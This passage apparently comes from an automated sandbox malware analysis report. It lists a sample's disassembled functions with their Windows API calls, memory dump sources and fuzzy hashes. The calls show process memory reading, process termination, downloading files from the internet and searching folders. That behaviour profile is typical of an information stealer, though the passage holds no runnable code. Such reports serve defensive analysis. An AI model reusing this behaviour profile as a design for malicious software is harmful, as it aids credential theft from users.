                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A413078345BD16BEB319B24AD5839B3E97575370CF48207AE042972A3D3FC448B8759
                                                                                                                                                                                                                                                  Function 009CF785 Relevance: 13.6, APIs: 9, Instructions: 105stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?,?,00010000,?,009D0362,?), ref: 009CF78D
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645128), ref: 009CF7D7
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064512C), ref: 009CF80E
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645134), ref: 009CF843
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064513C), ref: 009CF878
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645144), ref: 009CF8AD
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064514C), ref: 009CF8E2
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00645154), ref: 009CF90C
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0064515C), ref: 009CF93D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1659193697-0
                                                                                                                                                                                                                                                  • Opcode ID: 8ecfe62204233b8180d5d713a15dd486603fff8ba4875434be9a5bcb2e84d819
                                                                                                                                                                                                                                                  • Instruction ID: d966903298edfa6a8e00da11860d9dedecd83c96d4fa988fa2f165a1916ad718
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ecfe62204233b8180d5d713a15dd486603fff8ba4875434be9a5bcb2e84d819
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D414178A44BC46FFB319B24AD68B563E9B5723718F98307CE482971A3C3F84449C766
                                                                                                                                                                                                                                                  Function 009C35AC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 009C35C9
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 009C35ED
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009C3614
                                                                                                                                                                                                                                                  • ReadProcessMemory.KERNEL32(000000FF,00000000,?,00000208,00000000,??d,00643F3F,-00000208,?,000000FF,00000FFF,?,?), ref: 009C36C3
                                                                                                                                                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT(00000000,??d,00643F3F,00000000,00000000,000000FF,00000FFF,00000000,?), ref: 009C3741
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process$MemoryOpenReadmemset
                                                                                                                                                                                                                                                  • String ID: ??d
                                                                                                                                                                                                                                                  • API String ID: 960838850-3262641346
                                                                                                                                                                                                                                                  • Opcode ID: 89e6c9af5f48b8ed443eb51b86c866745eb1c3a28019441fa6cceb2bf1d7dc79
                                                                                                                                                                                                                                                  • Instruction ID: 1134e87253fd6c3c95b038e7ddd4e95c86ce499f7c7d8a8e4ea5bc0a1432bb67
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89e6c9af5f48b8ed443eb51b86c866745eb1c3a28019441fa6cceb2bf1d7dc79
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 555131B1908340ABD720DF20DD45B5B7BE9EBC6704F04892DF9849B382D7759A09DBA3
                                                                                                                                                                                                                                                  Function 00408695 Relevance: 12.1, APIs: 8, Instructions: 120networkfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004073C4,?), ref: 00406C13
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00406C1F
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?), ref: 00406C2B
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: lstrlenA.KERNEL32(00000000,?,?,?), ref: 00406C4A
                                                                                                                                                                                                                                                    • Part of subcall function 00406BE0: InternetCrackUrlA.WININET(00000000,00000000,00000000), ref: 00406C5A
                                                                                                                                                                                                                                                  • InternetOpenA.WININET ref: 004086E6
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 004086FB
                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32 ref: 0040875D
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00408772
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040878C
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000400), ref: 004087B1
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004087B8
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 004087C1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseFileHandle$CrackCreateOpenReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3324746675-0
                                                                                                                                                                                                                                                  • Opcode ID: 57e37dd70aee1b64da78086fa66d258c66e99df84f6a0c234287eb83fcdaefd4
                                                                                                                                                                                                                                                  • Instruction ID: 29006633d65c6e203f8d5fdba3151149f46b1154e2f49980151adca0ed2b26b0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57e37dd70aee1b64da78086fa66d258c66e99df84f6a0c234287eb83fcdaefd4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2C41A6B59002099BDB10EF71CD85AEF7BB9EF84344F10402DF915A3191EF34AA4ACBA5
                                                                                                                                                                                                                                                  Function 009C55A9 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009C55BF
                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 009C55C9
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 009C55D5
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009C55F9
                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 009C5608
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009C560F
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 009C5617
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 009C5622
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3836391474-0
                                                                                                                                                                                                                                                  • Opcode ID: 32374ddc62da0c9efc6679d4aff576bbbaf21c7cb326f5cef9821f99b737ff79
                                                                                                                                                                                                                                                  • Instruction ID: fd71c7b126773d97f416abc2e96e79f5138d4007316b28db7d97189a28039e3f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 32374ddc62da0c9efc6679d4aff576bbbaf21c7cb326f5cef9821f99b737ff79
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5801F279A00A056BE3202B60AC8EFBB77ADFF46786F051028F900D5181DF74DC90C666
                                                                                                                                                                                                                                                  Function 004127E8 Relevance: 11.6, APIs: 9, Instructions: 307COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove$memcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3033661859-0
                                                                                                                                                                                                                                                  • Opcode ID: de34b65fc7503c42e13109b3f3e82d58de50e4a04b5c11609258844348972ae1
                                                                                                                                                                                                                                                  • Instruction ID: 2ac252bb25fc00d8f9626fb7efa383948f2b52263c374b358be136e1b8cb81eb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: de34b65fc7503c42e13109b3f3e82d58de50e4a04b5c11609258844348972ae1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88A1C1317043109BC7149E19DA8095BB7E6EFC4754F68483EF444DB311D6BAEC92CB9A
                                                                                                                                                                                                                                                  Function 009C2A4F Relevance: 11.6, APIs: 9, Instructions: 307COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove$memcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3033661859-0
                                                                                                                                                                                                                                                  • Opcode ID: 7af7d1fd85c135fb44ad438f81dc935373bad9a349424fdd79d194c55280076f
                                                                                                                                                                                                                                                  • Instruction ID: c5513062016e17946ee5c3fe4576805e4850dab4d030b6a905b72e3944392ea2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7af7d1fd85c135fb44ad438f81dc935373bad9a349424fdd79d194c55280076f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6FA18F35B05301ABC7149F19C880A2BB7E6AFC8714F29897DF489DB311D676EC42CB92
                                                                                                                                                                                                                                                  Function 009B989F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144networkfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00001000), ref: 009B9975
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00001000), ref: 009B999B
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 009B99AD
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(19d), ref: 009B99B7
                                                                                                                                                                                                                                                    • Part of subcall function 009C2631: memcpy.MSVCRT(?,009C25B6,?,?,00000000,?,009C25B6,?,?,009C25EF,?,?,009C25B6,?,?,?), ref: 009C267E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseFileHandleRead$memcpy
                                                                                                                                                                                                                                                  • String ID: 19d
                                                                                                                                                                                                                                                  • API String ID: 1306965030-2662563406
                                                                                                                                                                                                                                                  • Opcode ID: da3cd38ceaf56c841c6e601ce89e91c6084a4beed059c7463e3cd911340a452f
                                                                                                                                                                                                                                                  • Instruction ID: 602c26139a55e847dbf6b94b445025fe1a8dd8b58fdfed596af3c812c8214ff5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: da3cd38ceaf56c841c6e601ce89e91c6084a4beed059c7463e3cd911340a452f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C512934119390AFE7219F28DD457A67FEAAFD2314F04160CF5C54A3A1EBF58588C752
                                                                                                                                                                                                                                                  Function 009B88FC Relevance: 9.1, APIs: 6, Instructions: 120networkfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009B6E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,009B6F0F,?,?,?,?), ref: 009B6E7A
                                                                                                                                                                                                                                                    • Part of subcall function 009B6E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?), ref: 009B6E86
                                                                                                                                                                                                                                                    • Part of subcall function 009B6E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,?), ref: 009B6E92
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?), ref: 009B8962
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 009B89D9
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 009B89F3
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000400), ref: 009B8A18
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 009B8A1F
                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 009B8A28
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHandleInternet$File$ReadWritelstrcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2640915698-0
                                                                                                                                                                                                                                                  • Opcode ID: 74c3c51af933105cee16bb21461a7dd861a7cf3cd62c55685cf234fe47bb9288
                                                                                                                                                                                                                                                  • Instruction ID: 1daf474dbd65d59f6101504a06f30520202ad39306e772c05980f32fcfcc45ec
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74c3c51af933105cee16bb21461a7dd861a7cf3cd62c55685cf234fe47bb9288
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F44163719002599BDB10EF74DD46FEE7BB9EF88350F009019F905A3151DF709A4ACB91
                                                                                                                                                                                                                                                  Function 009C07F6 Relevance: 9.1, APIs: 6, Instructions: 103stringmemoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C083C
                                                                                                                                                                                                                                                  • strchr.MSVCRT ref: 009C0856
                                                                                                                                                                                                                                                  • strchr.MSVCRT ref: 009C086E
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 009C0882
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C089A
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 009C0915
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrlenstrchr$HeapProcessstrcpy_s
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2110419323-0
                                                                                                                                                                                                                                                  • Opcode ID: d83169153d75055110f27535443527958fce46b29760db2d90432ee4ea193c58
                                                                                                                                                                                                                                                  • Instruction ID: e63aafab2c3e7a4270f8a79f3308086fcc72b1838d928c47cedb0175b317c0b9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d83169153d75055110f27535443527958fce46b29760db2d90432ee4ea193c58
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F31BD75A043569FD700EF38AC80B6B7BE9AF96300F00452DF884D7352EA31DA45CBA2
                                                                                                                                                                                                                                                  Function 009C3BFB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 117memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 009C3C17
                                                                                                                                                                                                                                                  • GetVolumeInformationA.KERNEL32 ref: 009C3C5E
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?), ref: 009C3C95
                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 009C3CBF
                                                                                                                                                                                                                                                    • Part of subcall function 009C3975: lstrcpy.KERNEL32(00000000,?), ref: 009C3999
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DirectoryHeapInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                                                                                                                                                                  • String ID: C
                                                                                                                                                                                                                                                  • API String ID: 1921768340-1037565863
                                                                                                                                                                                                                                                  • Opcode ID: 7ad6c88bac7b2b417639bc5adebd194043762363acf0846bb84d4a66be8a6070
                                                                                                                                                                                                                                                  • Instruction ID: e69ba2ea384b3fd0f377dfa114f03bce20ff45534b2b6ba6106e96b4e57503ec
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ad6c88bac7b2b417639bc5adebd194043762363acf0846bb84d4a66be8a6070
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC41F674E08344ABD710AB349C46F6F7AAA9FC6354F00D41DF895572A2DB748E05C7A3
                                                                                                                                                                                                                                                  Function 009C9CF4 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 276stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009C4D47: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 009C4D7F
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?), ref: 009C9D3E
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: FindFirstFileA.KERNEL32(?,?), ref: 009C98BC
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: StrCmpCA.SHLWAPI(?,0042EEFC), ref: 009C99A2
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: PathMatchSpecA.SHLWAPI(?,?), ref: 009C9A22
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: lstrcat.KERNEL32(?,?), ref: 009C9A48
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: lstrcat.KERNEL32(?,?), ref: 009C9A81
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: lstrcat.KERNEL32(?,00644BCD), ref: 009C9A89
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: lstrcat.KERNEL32(?,?), ref: 009C9A97
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: FindNextFileA.KERNEL32(00000000,?), ref: 009C9CB6
                                                                                                                                                                                                                                                    • Part of subcall function 009C986A: FindClose.KERNEL32(00000000), ref: 009C9CC5
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcat$Find$FilePath$CloseFirstFolderMatchNextSpeclstrcpy
                                                                                                                                                                                                                                                  • String ID: (2c$@2c$T2c$`2c
                                                                                                                                                                                                                                                  • API String ID: 683699470-3460517010
                                                                                                                                                                                                                                                  • Opcode ID: 40a6595c649b11bb180e860fb16e9663d2422a6314ab4a77bc593ff0e52c40fe
                                                                                                                                                                                                                                                  • Instruction ID: 01732a54d2f3ee24f1c3403de31355df095551e69309437155e5cf449fe89f7b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40a6595c649b11bb180e860fb16e9663d2422a6314ab4a77bc593ff0e52c40fe
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DC15E75D10B4A9BCB01DF78C942AE9B3B4BF99304B00D619E94997A01EB30F6A5CB91
                                                                                                                                                                                                                                                  Function 009CA09B Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 245COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009CA0B5
                                                                                                                                                                                                                                                    • Part of subcall function 009C4D47: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 009C4D7F
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009CA202
                                                                                                                                                                                                                                                    • Part of subcall function 009C39A7: lstrcpy.KERNEL32(00000000), ref: 009C39CA
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 009CA324
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memset$FolderPathlstrcpy
                                                                                                                                                                                                                                                  • String ID: XLd$hLd
                                                                                                                                                                                                                                                  • API String ID: 1363978202-3875103885
                                                                                                                                                                                                                                                  • Opcode ID: 9a4ca41eec0fa1d7cc79818e71f743f84f5a572b4498b9dcc9f9fbeb1bbbc9b5
